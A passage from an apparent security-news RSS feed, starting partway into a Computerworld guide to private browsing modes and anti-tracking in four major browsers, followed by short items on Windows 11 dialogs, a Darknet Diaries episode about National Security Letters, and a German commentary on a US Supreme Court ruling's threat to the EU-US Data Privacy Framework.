<p>But privacy-promising labels can be treacherous. Simply put, going “<a href="https://www.computerworld.com/article/1670600/you-are-not-very-incognito-in-incognito-mode.html" title="Incognito">incognito</a>” is as effective in guarding <a href="https://www.computerworld.com/article/1612064/cookie-conundrum-the-loss-of-third-party-trackers-could-diminish-your-privacy.html">online privacy</a> as witchcraft is in warding off a common cold.</p>



<p>That’s because private browsing is intended to wipe <i>local</i> traces of where you’ve been, what you’ve searched for, the contents of forms you’ve filled. It’s meant to hide, and not always conclusively at that, your tracks from others with access to the personal computer. That’s it.</p>



<h2 class="wp-block-heading">How to keep web browsing private</h2>



<p>We’ve spelled out how to go into incognito or private browsing mode for the four major browsers in this order: </p>



<ul class="wp-block-list">
<li>Google Chrome’s Incognito mode</li>



<li>Microsoft Edge’s InPrivate browsing</li>



<li>Mozilla Firefox’s New Private Window mode</li>



<li>Apple Safari’s New Private window mode</li>
</ul>



<p>At their most basic, these features promise that they won’t record visited sites to the browsing history, save cookies that show you’ve been to and logged into sites, or remember credentials like passwords used during sessions. But your traipses through the web are still <a href="https://www.computerworld.com/article/1611809/what-a-future-without-browser-cookies-will-look-like.html">traceable by Internet providers</a> – and the authorities who serve subpoenas to those entities – employers who control the company network and advertisers who follow your every footstep.</p>



<p>To end that cognitive dissonance, <a href="https://www.computerworld.com/article/1639403/online-privacy-best-browsers-settings-and-tips.html">most browsers have added more advanced privacy tools</a>, generically known as “anti-trackers,” which block various kinds of bite-sized chunks of code that advertisers and websites use to trace where people go in attempts to compile digital dossiers or serve targeted advertisements.</p>



<p>Although it might seem reasonable that a browser’s end game would be to craft a system that blends incognito modes with anti-tracking, it’s highly unlikely. Using either private browsing or anti-tracking carries a cost: site passwords aren’t saved for the next visit or sites break under the tracker scrubbing. Nor are those costs equal. It’s much easier to turn on some level of anti-tracking by default than it would be to do the same for private sessions, as evidenced by the number of browsers that do the former without complaint while <i>none</i> do the latter.</p>



<p>Private browsing will, by necessity, always be a niche, as long as sites rely on cookies for mundane things like log-ins and cart contents.</p>



<p>But the mode remains a useful tool whenever the browser — and the computer it’s on — are shared. To prove that, we’ve assembled instructions and insights on using the incognito features — and anti-tracking tools — offered by the top four browsers: <a title="Google Chrome" href="https://www.computerworld.com/article/1719300/a-mac-user-s-guide-to-the-google-chrome-browser.html">Google Chrome</a>, Microsoft’s <a href="https://www.computerworld.com/article/1713244/how-to-replace-edge-as-windows-default-browser.html">Chromium-based Edge</a>, Mozilla’s Firefox and Apple’s Safari.</p>



<h2 class="wp-block-heading">How to go incognito with Google Chrome</h2>



<p>Although <i>incognito</i> may be a synonym to some users for any browser’s private mode, Google gets credit for grabbing the word as the feature’s snappiest name when it launched the tool in late 2008, just months after Chrome debuted.</p>



<p>The easiest way to open an Incognito window is with the keyboard shortcut combination <strong>Ctrl-Shift-N</strong> (Windows) or <strong>Command-Shift-N</strong> (macOS).</p>



<p>Another way is to click on the menu on the upper right — it’s the three vertical dots — and select <strong>New Incognito Window</strong> from the list.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="876" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Open a new Incognito window in Chrome using keyboard shortcuts or from the menu by choosing “New Incognito window.”</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<p>The new Incognito window can be recognized by the dark background and the stylized “spy” icon just to the left of the three-dots menu. Chrome also reminds users of just what Incognito does and doesn’t do each time a new window is opened. The message may get tiresome for regular Incognito users, but it may also save a job or reputation; it’s important that users remember Incognito doesn’t prevent ISPs, businesses, schools and organizations from knowing where customers, workers, students, and others went on the web or what they searched for.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="699" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Each time a new Incognito window is opened, Chrome reminds users what Incognito doesn’t save. The browser also puts a toggle on the screen for blocking third-party cookies.</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<p>Incognito’s introductory screen also displays a toggle — it’s on by default — along with text that states third-party cookies will be blocked while in the privacy mode. Although cookies are never saved locally as long as the user stays in Incognito, websites have been able to track user movements from site to site <i>while within Incognito</i>. Such tracking might be used, for example, to display ads to a user visiting multiple sites in Incognito. This third-party cookie blocking, which halts such behavior, debuted in May 2020.</p>



<p>Google has been experimenting with new language on Chrome’s Incognito introductory page, but it’s yet to make it to the desktop browser. In the Canary build of Chrome on Android, however, the intro now outlines “What Incognito does” and “What Incognito doesn’t do,” to make the mode’s capabilities somewhat clearer to the user. (Some have speculated that the changes were made in reaction to a still-ongoing class-action lawsuit file in 2020 that alleged Google continued to track users’ online behavior and movements in Incognito.)</p>



<p>Once a tab in Incognito has been filled with a website, Chrome continues to remind users that they’re in Incognito by the dark background of the address bar and window title.</p>



<p>A link on an existing page can be opened directly into Incognito by right-clicking the link, then choosing <strong>Open Link in Incognito Window</strong> from the resulting menu.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="876" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>What Incognito looks like after pulling up a website. Note the “spy” icon at the right of the address bar.</p>
</figcaption></figure><p class="imageCredit">Google</p></div>



<p><strong>Pro tip</strong><em><strong>:</strong> To close an Incognito window, shutter it like any other Chrome window by clicking the X in the upper right corner (Windows) or the red dot in the upper left (macOS).</em></p>



<h2 class="wp-block-heading">How to privately browse with Microsoft Edge</h2>



<p>Microsoft borrowed the name of its private browsing mode, InPrivate, from Internet Explorer (IE), the finally-being-retired legacy browser. InPrivate appeared in IE in March 2009, about three months after Chrome’s Incognito and three months before Firefox’s privacy mode. When Edge was first released in 2015 and then relaunched as a clone of Chrome in January 2020, InPrivate was part of the package, too.</p>



<p>At the keyboard, the combination of <strong>Ctrl-Shift-N</strong> (Windows) or <strong>Command-Shift-N</strong> (macOS) opens an InPrivate window.</p>



<p>A slower way to get there is to click on the menu at the upper right — it’s three dots arranged horizontally — and choose <strong>New InPrivate Window</strong> from the menu.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="874" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Like other browsers, Edge will take you incognito from the menu when you pick New InPrivate window.</p>
</figcaption></figure><p class="imageCredit">Microsoft</p></div>



<p>Edge does a more thorough job of explaining what its private browsing mode does and doesn’t do than any of its rivals, with on-screen paragraphs dedicated to describing what data the browser collects in InPrivate and how the strictest additional anti-tracking setting can be called on from within the mode. In addition, Edge uses the more informal “What Incognito does” and “What Incognito doesn’t do” language on its InPrivate introductory screen.</p>



<p>Microsoft’s browser also well marks InPrivate when the mode is operating: an oval marked “In Private” to the right of the address bar combines with a full-black screen to make sure users know where they’re at.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="843" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Edge offers a detailed explanation of what its private browsing mode does and doesn’t do.</p>
</figcaption></figure><p class="imageCredit">Microsoft</p></div>



<p>It’s also possible to launch an InPrivate session by right-clicking a link within Edge and selecting <strong>Open in InPrivate Window</strong>. That option is grayed out when already in a private browsing session but using <strong>Open Link in New Tab</strong> does just that within the current InPrivate frame.</p>



<p>To end InPrivate browsing, simply shut the window by clicking the X in the upper right corner (Windows) or click the red dot at the upper left (macOS).</p>



<p>Although Edge is based on Chromium, the same open-source project that comes up with the code to power Chrome, the Redmond, WA company integrated anti-tracking into its browser. Dubbed “Tracking Prevention,” it works both in Edge’s standard and InPrivate modes.</p>



<p>To set Tracking Prevention, choose <strong>Settings</strong> from the three-ellipses menu at the right, then at the next page, pick <strong>Privacy, Search and Services</strong>. Choose one of the three options — <strong>Basic, Balanced</strong> or <strong>Strict</strong> — and make sure the toggle for <strong>Tracking prevention</strong> is in the “on” position. If you want InPrivate to always default to the harshest anti-tracking — not a bad idea — toggle <strong>Always use “Strict” tracking prevention when browsing InPrivate</strong> to “on.”</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="708" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Toggle Always use Strict to the ‘on’ position and InPrivate will apply the most stringent anti-tracking even though Edge’s standard mode is set to, say, Balanced.</p>
</figcaption></figure><p class="imageCredit">Microsoft</p></div>



<p><strong>Pro tip:</strong> <i>To open Edge with InPrivate — rather than first opening Edge in standard mode, then launching InPrivate — right-click the Edge icon in the Windows taskbar and select <strong>New InPrivate Window</strong> from the list. There is no similar one-step way to do this in macOS.</i></p>



<h2 class="wp-block-heading">How to privately browse with Mozilla Firefox</h2>



<p>After Chrome trumpeted Incognito, browsers without something similar hustled to catch up. Mozilla added its take — dubbed Private Browsing — about six months after Google, in June 2009.</p>



<p>From the keyboard, a private browsing session can be called up using the combination <strong>Ctrl-Shift-P</strong> (Windows) or <strong>Command-Shift-P</strong> (macOS).</p>



<p>Alternately, a private window will open from the menu at the upper right of Firefox — three short horizontal lines — after selecting <strong>New private window</strong>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="889" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Opening a private browsing window is as simple as choosing New Private Window from the Firefox menu.</p>
</figcaption></figure><p class="imageCredit">Mozilla</p></div>



<p>A private session window is marked by the purple “mask” icon in the title bar of the Firefox frame. In Windows, the icon is to the left of the minimize/maximize/close buttons; on a Mac, the mask squats at the far right of the title bar. Unlike Chrome and Edge, Firefox does not color-code the top components of the browser window to signify the user is in privacy mode.</p>



<p>Like other browsers, Firefox warns users that private browsing is no cure-all for privacy ills but is limited in what it blocks from being saved during a session. “Private window: Firefox clears your search and browsing history when you close all private windows. This doesn’t make you anonymous,” the caution reads.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="654" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Firefox reminds users that while a private session doesn’t save searches or browsing histories, it doesn’t cloak them in complete anonymity. The page also links to more detailed information.</p>
</figcaption></figure><p class="imageCredit">Mozilla</p></div>



<p>A link can be opened into a Firefox Private Window by right-clicking the link, then choosing <strong>Open Link in New Private Window</strong> from the menu.</p>



<p>To close a Private Window, shut it down just as one would any Firefox window by clicking the X in the upper right corner (Windows) or the red dot in the upper left (macOS).</p>



<p>Notable is that Firefox’s private browsing mode is accompanied by the browser’s superb “Enhanced Tracking Protection,” a suite of tracker blocking tools that stymie all sorts of ad-and-site methods for identifying users, then watching and recording their online behavior. While the earliest version of this was offered only inside Private Windows, the expanded technologies also work within standard mode.</p>



<p>Because Enhanced Tracking Protection is enabled by default within Firefox, it doesn’t matter which of its settings — <strong>Standard, Strict</strong> or <strong>Custom</strong> — is selected as far as private browsing goes; everything that can be blocked will be blocked.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>The shield appears in the address bar to note what trackers were blocked by Firefox in a Private Window. Clicking on the icon brings up an accounting of what was barred.</p>
</figcaption></figure><p class="imageCredit">Mozilla</p></div>



<p><strong>Pro tip:</strong> <i>Private Browsing sessions take place over the more secure HTTPS, not the once-standard HTTP protocol. Users don’t need to do anything: The new HTTPS-only policy is on by default. (If the destination site doesn’t support HTTPS, Firefox will go into fallback mode, connecting via HTTP instead.)</i></p>



<h2 class="wp-block-heading">How to browse privately with Apple’s Safari</h2>



<p>Chrome may get far more attention for its Incognito than any other browser — no surprise, since it’s by far the most popular browser on the planet — but Apple’s Safari was actually the first to introduce private browsing. The term <i>private browsing</i> was first bandied in 2005 to describe early Safari features that limited what was saved by the browser.</p>



<p>Side note: Early in private browsing, the label <i>porn mode</i> was often used as a synonym to describe what many writers and reporters assumed was the primary application of the feature. The term has fallen out of favor.</p>



<p>To open what Safari calls a Private Window on a Mac, users can do a three-key combination of <strong>Command-Shift-N</strong>, the same shortcut Chrome adopted. Otherwise, a window can be called up by selecting the <strong>File</strong> menu and clicking on New Private Window.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="803" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>From the File menu in Safari, selecting New Private Window gets you started.</p>
</figcaption></figure><p class="imageCredit">Apple</p></div>



<p>Safari tags each Private Window by darkening the address bar. It also issues a reminder of what it does — or more accurately — what it doesn’t do. “Safari will keep your browsing history private for all tabs of this window. After you close this window, Safari won’t remember the pages you visited, your search history or your AutoFill information,” the top-of-the-page note reads. The warning is more terse than those of other browsers and omits cautions about still-visible online activity.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="321" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>The darkened address bar at the top — and the Private button in the left window corner — signal that this Safari window is for private browsing.</p>
</figcaption></figure><p class="imageCredit">Apple</p></div>



<p>Like Firefox, Safari automatically engages additional privacy technologies, whether the user browses in standard or private mode. Safari’s Intelligent Tracking Protection (ITP), which has been around for nearly a decade and repeatedly upgraded, now blocks all third-party cookies, among other components advertisers and services use to track people as they bounce from one site to another. ITP is controlled by a single on-off switch — on is the default — found in <strong>Preferences</strong> under the <strong>Privacy</strong> icon. If the <strong>Website tracking:</strong> box is checked to mark <strong>Prevent cross-site tracking</strong>, ITP is on.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized large"> width="1024" height="453" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption"><p>Switching on cross-site tracking enables Safari’s Intelligent Tracking Protection, which blocks a wide variety of bits advertisers try to use to follow you around the web while you’re using a Private Window.</p>
</figcaption></figure><p class="imageCredit">Apple</p></div>



<p>A link can be opened directly to a Private Window by right-clicking, then selecting <strong>Open Link in New Private Window</strong>. Close a Private Window just as any Safari window, by clicking the red dot in the upper left corner of the browser frame.</p>



<p><strong>Pro tip:</strong> <i>Once in a Safari Private Window, opening a new tab — either by clicking the + icon at the upper right or by using the Command-T key combo — omits the Private Browsing Enabled notice. (The darkened address bar remains as the sole indicator of a private browsing session.) Other browsers, such as Firefox, repeat their cautionary messages each time a tab is opened in an incognito session.</i></p>



<p><strong>Related reading:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.computerworld.com/article/1717405/googles-chromium-browser-explained.html">Chromium explained: How the open-source engine drives today’s browsers</a></li>



<li><a href="https://www.computerworld.com/article/4083528/ai-web-browsers-are-cool-helpful-and-utterly-untrustworthy.html">AI web browsers are cool, helpful, and utterly untrustworthy</a></li>



<li><a href="https://www.computerworld.com/article/3996011/ai-windows-web-browser.html">How AI will transform your Windows web browser</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11 rejuvenation list just got longer, with more legacy dialogs headed to WinUI 3]]></title>
<description><![CDATA[Windows 11's local account dialog still tells users to use the Windows 8 Search charm, a feature that has not existed since 2015. Marcus Ash confirmed the dialog is now on Microsoft's rejuvenation list, joining the Run box, file dialogs, and other legacy UI getting rewritten in WinUI.
The post Wi...]]></description>
<link>https://tsecurity.de/de/3651966/windows-tipps/windows-11-rejuvenation-list-just-got-longer-with-more-legacy-dialogs-headed-to-winui-3/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651966/windows-tipps/windows-11-rejuvenation-list-just-got-longer-with-more-legacy-dialogs-headed-to-winui-3/</guid>
<pubDate>Tue, 07 Jul 2026 17:12:01 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Windows 11's local account dialog still tells users to use the Windows 8 Search charm, a feature that has not existed since 2015. Marcus Ash confirmed the dialog is now on Microsoft's rejuvenation list, joining the Run box, file dialogs, and other legacy UI getting rewritten in WinUI.</p>
<p>The post <a rel="nofollow" href="https://www.windowslatest.com/2026/07/07/windows-11-rejuvenation-list-just-got-longer-with-more-legacy-dialogs-headed-to-winui-3/">Windows 11 rejuvenation list just got longer, with more legacy dialogs headed to WinUI 3</a> appeared first on <a rel="nofollow" href="https://www.windowslatest.com/">Windows Latest</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The FBI letter was top secret. Fighting it rewrote online privacy law. ✉ Darknet Diaries Ep. 176 NSL]]></title>
<description><![CDATA[Author: Jack Rhysider - Bewertung: 38x - Views:438 One day Nick got a visit from the FBI demanding he give them data on one of his customers. They asked for it in the form of a National Security Letter or NSL. Something wasn’t right about this letter. It seemed to violate the constitution. So he ...]]></description>
<link>https://tsecurity.de/de/3650766/it-security-video/the-fbi-letter-was-top-secret-fighting-it-rewrote-online-privacy-law-darknet-diaries-ep-176-nsl/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650766/it-security-video/the-fbi-letter-was-top-secret-fighting-it-rewrote-online-privacy-law-darknet-diaries-ep-176-nsl/</guid>
<pubDate>Tue, 07 Jul 2026 09:34:48 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Jack Rhysider - Bewertung: 38x - Views:438 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/K5vBLzojdDA?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>One day Nick got a visit from the FBI demanding he give them data on one of his customers. They asked for it in the form of a National Security Letter or NSL. Something wasn’t right about this letter. It seemed to violate the constitution. So he set out to change the law.<br />
<br />
Learn more about Nicks work at [calyxinstitute.org](calyxinstitute.org) and [phreeli.com](phreeli.com).<br />
<br />
Check out Cindy’s book [Privacy’s Defender: My Thirty-Year Fight Against Digital Surveillance](https://amzn.to/4gXuK2J).<br />
<br />
### Sources<br />
<br />
* https://www.democracynow.org/2010/8/11/gagged_for_6_years_nick_merrill<br />
* https://globalfreedomofexpression.columbia.edu/cases/u-s-nicholas-merrill-v-loretta-e-lynch-14-cv-9763-vm/<br />
* https://clearinghouse.net/case/12966/<br />
* https://www.theguardian.com/law/2015/dec/06/fbi-national-security-letter-gag-order-nick-merrill<br />
* https://www.aclu.org/documents/national-security-letters<br />
* https://www.eff.org/cases/re-matter-2011-national-security-letter<br />
* Cindy’s Book: Privacy’s Defender: My Thirty-Year Fight Against Digital Surveillance<br />
<br />
<br />
### Attribution<br />
<br />
Darknet Diaries is created by [Jack Rhysider](https://twitter.com/jackrhysider).<br />
<br />
Assembled by Tristan Ledger.<br />
<br />
Episode artwork by [odibagas](https://99designs.com/profiles/2589930).<br />
<br />
Mixing by [Proximity Sound](https://proximitysound.com/). <br />
<br />
Theme music created by [Breakmaster Cylinder](https://www.personbproductions.com/). Theme song available for listen and download at [bandcamp](https://breakmastercylinder.bandcamp.com/track/darknet-diaries-theme). Or listen to it [on Spotify](https://open.spotify.com/album/3P5CCxXNuUSQldH0GA5ZUy?si=eirhXEyFQaKNf-vdfmb8Jg).<br />
<br />
Visit https://darknetdiaries.com/episode/##/ for a list of sources, full transcripts, and to listen to all episodes.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[176: NSL]]></title>
<description><![CDATA[One day Nick got a visit from the FBI demanding he give them data on one of his customers. They asked for it in the form of a National Security Letter or NSL. Something wasn’t right about this letter. It seemed to violate the constitution. So he set out to change the law.Learn more about Nicks wo...]]></description>
<link>https://tsecurity.de/de/3650717/podcasts/176-nsl/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650717/podcasts/176-nsl/</guid>
<pubDate>Tue, 07 Jul 2026 09:04:18 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>One day Nick got a visit from the FBI demanding he give them data on one of his customers. They asked for it in the form of a National Security Letter or NSL. Something wasn’t right about this letter. It seemed to violate the constitution. So he set out to change the law.</p><p>Learn more about Nicks work at <a href="https://calyxinstitute.org/"><strong>calyxinstitute.org</strong></a> and <a href="https://www.phreeli.com/"><strong>phreeli.com</strong></a>.</p><p>Check out Cindy’s book <a href="https://amzn.to/4gXuK2J"><strong>Privacy’s Defender: My Thirty-Year Fight Against Digital Surveillance</strong></a> (https://amzn.to/4gXuK2J).</p><h3>Sponsors</h3><p>Support for this show comes from <a href="https://www.threatlocker.com/"><strong>ThreatLocker®</strong></a>. ThreatLocker® is a Zero Trust Endpoint Protection Platform that strengthens your infrastructure from the ground up. With ThreatLocker® Allowlisting and Ringfencing™, you gain a more secure approach to blocking exploits of known and unknown vulnerabilities. ThreatLocker® provides Zero Trust control at the kernel level that enables you to allow everything you need and block everything else, including ransomware! Learn more at <a href="https://www.threatlocker.com/"><strong>www.threatlocker.com</strong></a>.</p><p>Support for this episode comes from <a href="https://www.netsuite.com/darknet"><strong>NetSuite</strong></a>. NetSuite gives you visibility and control of your financials, planning, budgeting, and of course - inventory - so you can manage risk, get reliable forecasts, and improve margins. NetSuite helps you identify rising costs, automate your manual business processes, and see where to save money. KNOW your numbers. KNOW your business. And get to KNOW how NetSuite can be the source of truth for your entire company. Visit <a href="https://www.netsuite.com/darknet"><strong>www.netsuite.com/darknet</strong></a> to learn more.</p><p>This show is sponsored by <a href="http://mazehq.com/darknet"><strong>Maze</strong></a>. Maze uses AI agents to triage and remediate cloud vulnerabilities by figuring out what’s actually exploitable, not just what’s theoretically risky. They remove the noise, prioritize vulns that matter, and manage remediation, so your team stops wasting time on meaningless vulns. Visit <a href="http://mazehq.com/darknet"><strong>MazeHQ.com/darknet</strong></a> for more information.</p><p><a href="https://darknetdiaries.com/sponsors/"><strong>View all active sponsors.</strong></a></p><h3>Sources</h3><ul>
<li><a href="https://www.democracynow.org/2010/8/11/gagged_for_6_years_nick_merrill"><strong>https://www.democracynow.org/2010/8/11/gagged_for_6_years_nick_merrill</strong></a></li>
<li><a href="https://globalfreedomofexpression.columbia.edu/cases/u-s-nicholas-merrill-v-loretta-e-lynch-14-cv-9763-vm/"><strong>https://globalfreedomofexpression.columbia.edu/cases/u-s-nicholas-merrill-v-loretta-e-lynch-14-cv-9763-vm/</strong></a></li>
<li><a href="https://clearinghouse.net/case/12966/"><strong>https://clearinghouse.net/case/12966/</strong></a></li>
<li><a href="https://www.theguardian.com/law/2015/dec/06/fbi-national-security-letter-gag-order-nick-merrill"><strong>https://www.theguardian.com/law/2015/dec/06/fbi-national-security-letter-gag-order-nick-merrill</strong></a></li>
<li><a href="https://www.aclu.org/documents/national-security-letters"><strong>https://www.aclu.org/documents/national-security-letters</strong></a></li>
<li><a href="https://www.eff.org/cases/re-matter-2011-national-security-letter"><strong>https://www.eff.org/cases/re-matter-2011-national-security-letter</strong></a></li>
<li>Cindy’s Book: <a href="https://amzn.to/4gXuK2J"><strong>Privacy’s Defender: My Thirty-Year Fight Against Digital Surveillance</strong></a>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weckruf zur Digitalen Souveränität]]></title>
<description><![CDATA[Mit dem Urteil Trump vs. Slaughter hat der US Supreme Court womöglich das EU-US Data Privacy Framework gekillt.
alexkich/Shutterstock.com



Deutschland fliegt bei der Fußball-WM im Sechzehntelfinale raus und in Berlin spekuliert man über die Reformpläne der Regierung – da kann ein Urteil in eine...]]></description>
<link>https://tsecurity.de/de/3649414/it-security-nachrichten/weckruf-zur-digitalen-souveraenitaet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3649414/it-security-nachrichten/weckruf-zur-digitalen-souveraenitaet/</guid>
<pubDate>Mon, 06 Jul 2026 18:43:27 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Trump_FTC.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Court" class="wp-image-4193250" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Mit dem Urteil Trump vs. Slaughter hat der US Supreme Court womöglich das EU-US Data Privacy Framework gekillt.</p>
</figcaption></figure><p class="imageCredit">alexkich/Shutterstock.com</p></div>



<p>Deutschland fliegt bei der Fußball-WM im Sechzehntelfinale raus und in Berlin spekuliert man über die Reformpläne der Regierung – da kann ein Urteil in einem Trump-Verfahren vor dem Supreme Court, dem obersten Bundesgericht der USA, schonmal übersehen werden. Zumal das Gericht an diesem Tag gleich in vier Trump-Fällen urteilte.</p>



<p>Doch eines der vier Urteile, nämlich das im Fall <a href="https://www.supremecourt.gov/opinions/25pdf/25-332_qn12.pdf">Trump versus Slaughter</a>, enthält viel wirtschaftspolitische Sprengkraft. Es hat das Potenzial dazu, den Datenaustausch zwischen den EU und der USA auf den Kopf zustellen. Zudem könnte die Cloud-Nutzung US-amerikanischer Anbieter – egal, ob in Europa gehostet – illegal sein.</p>



<h2 class="wp-block-heading">FTC verliert Unabhängigkeit</h2>



<p>Worum geht es? Trump hatte 2025 die demokratische FTC-Kommissarin Rebecca Kelly Slaughter (<a href="https://de.wikipedia.org/wiki/Federal_Trade_Commission">FTC = Federal Trade Commission</a>) mit der Begründung gefeuert, dass ihre Tätigkeit im Widerspruch zu den Prioritäten seiner Regierung stehe. Damit verstieß er gegen das über 90 Jahre alte Grundsatzurteil <a href="https://en.wikipedia.org/wiki/Humphrey%27s_Executor_v._United_States">Humphrey’s Executor v. United States</a>, das Mitglieder unabhängiger Kommission vor politisch motivierten Entlassungen schützen soll.</p>



<p>Doch der Supreme Court gab Trump jetzt mit Verweis auf die Unitary Excutive Theory recht. Danach hat die gesamte Exekutivgewalt, auch über Behörden, Aufsichtsorganisationen etc. letztlich beim Präsidenten zu liegen. Oder anders ausgedrückt: Das Gericht hat die Unabhängigkeit der FTC als US-amerikanische Wettbewerbs- und Verbraucherschutzbehörde aufgehoben. Ein Schritt, der nach <a href="https://www.nytimes.com/live/2026/06/29/us/trump-supreme-court-presidential-power">Ansicht der New York Times</a> das Machtgefüge in Washington grundlegend verändert. Denn künftig kann ein US-Präsident zahlreiche Behörden stärker nach seinen politischen Vorstellungen besetzen und missliebige Behördenchefs einfacher feuern.</p>



<h2 class="wp-block-heading">Data Privacy Framework in Gefahr</h2>



<p>Ja und?, ist man versucht, als Europäer und Deutscher zu sagen. Was jucken uns US-interne Streitigkeiten um Behörden, solange wir unsere unabhängigen Institutionen haben. Auf den ersten Blick mag das stimmen. Doch die Sache hat einen gewaltigen Haken. Das <a href="https://www.computerwoche.de/article/2825183/eu-billigt-data-privacy-framework.html?utm=hybrid_search">EU-US Data Privacy Framework (DPF)</a>, das den Datenaustausch zwischen den USA und Europa regelt, stützt sich auf die FTC als unabhängige Aufsichtsbehörde für den Datenschutz in den USA.</p>



<p>Und das gleich 259-mal, wie <a href="https://noyb.eu/de/us-supreme-court-just-blew-eu-us-data-transfers">Max Schrems nachgezählt</a> hat. Wir erinnern uns, Schrems ist der Österreicher, der bereits 2020 das <a href="https://www.computerwoche.de/article/2797775/aufregung-um-gekipptes-privacy-shield.html">Privacy-Shield-Abkommen</a> und 2015 Safe Harbor mit seinen Klagen vor dem EuGH zu Fall brachte. Der Schönheitsfehler an der Sache mit der FTC als Datenschutzaufsicht aus seiner Sicht: Das EU-Vertragsrecht verlangt, dass Datenschutzbehörden unabhängig sein müssen. Konkret findet sich diese Anforderung in <a href="https://eur-lex.europa.eu/legal-content/EN/TXT/?uri=CELEX:12016E/TXT">Artikel 16(2) AEUV</a> sowie <a href="https://eur-lex.europa.eu/eli/treaty/char_2012/oj/eng">Artikel 8(3) der Charta der Grundrechte der EU</a>.</p>



<h2 class="wp-block-heading">Schrems und noyb wollen klagen</h2>



<p>Vor diesem Hintergrund liegen für Schrems und die <a href="https://noyb.eu/de/ueber-uns">NGO noyb</a> die Konsequenzen auf der Hand: „Da es in den USA keine unabhängigen Behörden mehr gibt, fordern wir die Kommission auf, die Angemessenheitsentscheidung für die USA in einem geordneten Prozess aufzuheben.“ Einen <a href="https://noyb.eu/sites/default/files/2026-06/Letter_noyb_EU-US_data_transfers.pdf">entsprechenden Brief</a> haben sie bereits an die EU-Kommission geschickt. Zudem werde man in den nächsten Wochen Klage beim EuGH einreichen.</p>



<p>Besteht nun Anlass zu Panik? Momentan sicher nicht. Zumal die USA bereits seit längerer Zeit auf die EU bezüglich Datenverarbeitung massiv Druck ausüben. Und bis der EuGH womöglich das Data Privacy Framework in einem Verfahren kippt, dürften zwei bis drei Jahre ins Land gehen.</p>



<h2 class="wp-block-heading">Alternativen suchen</h2>



<p>Also bequem zurücklehnen? Das sicher auch nicht. Das Urteil des Supreme Court sollte vielmehr als ein Weckruf für mehr Digitale Souveränität verstanden werden. Zumal es zeigt, wie sehr Datenschutz und Datensicherheit im Zusammenhang mit den USA von der Laune – pardon, Executive Order – des US-Präsidenten abhängen.</p>



